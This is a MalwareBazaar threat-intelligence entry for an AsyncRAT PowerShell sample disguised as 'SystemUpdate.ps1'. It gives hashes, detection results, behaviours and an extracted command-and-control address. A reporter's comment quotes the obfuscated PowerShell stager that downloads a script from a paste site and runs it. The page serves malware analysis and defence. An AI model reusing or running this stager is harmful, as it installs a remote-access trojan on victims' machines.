MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d16cb614269bbbadd67f4cf0a5f5a7e857c6cf2541f795258ceac91416099ead. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



AsyncRAT


Vendor detections: 5


Intelligence 5 IOCs YARA File information Comments

SHA256 hash: d16cb614269bbbadd67f4cf0a5f5a7e857c6cf2541f795258ceac91416099ead
SHA3-384 hash: 37e2d1db8eae3d4f4eba5520990f871e2463b9cb51bf33d02c7ef7cdc0e126f3d2f01d09f6f0db3958a2ef47f6e66c7f
SHA1 hash: d589de45224953efbe8a7d4bff6fc1a7e16ad019
MD5 hash: 1fc41624d5f09aebeb24cd6e1e7390a4
humanhash: purple-artist-louisiana-nebraska
File name:SystemUpdate.ps1
Download: download sample
Signature AsyncRAT
File size:69'330 bytes
First seen:2021-09-02 19:36:59 UTC
Last seen:Never
File type:PowerShell (PS) ps1
MIME type:text/plain
ssdeep 1536:/yrXwE6RRYwyhMZX5GePt7e8SqHk+RAWq+sep6EZV5:qrgTehLmSmHpp135
Threatray 1'270 similar samples on MalwareBazaar
TLSH T1F563C489830BD3AFA41F18BFEC4A196323E50E26E9FD8185D3F8449E19BE55D64E014F
Reporter AndreGironda
Tags:aggah AsyncRAT hagga ps1 Snip3


Avatar
AndreGironda
From PowerShell-encoded VBS :

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command Add-Type -AssemblyName Microsoft.VisualBasic;[System.Net.WebClient]$WEB=New-Object System.Net.WebClient;[String]$DownloadFile='D'+'o'+'w'+'nlo'+'ad'+'Fi'+'l'+'e';[Microsoft.VisualBasic.Interaction]::CallByName($WEB,$DownloadFile,1,@('https://sharetext.me/raw/s5bxw8wu','C:\Users\Public\SystemUpdate.PS1'));PowerShell -File C:\Users\Public\SystemUpdate.PS1

Intelligence


File Origin
# of uploads :
1
# of downloads :
312
Origin country :
n/a
Vendor Threat Intelligence
Threat name:
Script-PowerShell.Trojan.Invoker
Status:
Malicious
First seen:
2021-09-02 19:37:06 UTC
AV detection:
2 of 43 (4.65%)
Threat level:
  5/5
Result
Malware family:
asyncrat
Score:
  10/10
Tags:
family:asyncrat rat
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetThreadContext
Drops startup file
Async RAT payload
AsyncRat
Malware Config
C2 Extraction:
36.255.96.200:4190
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments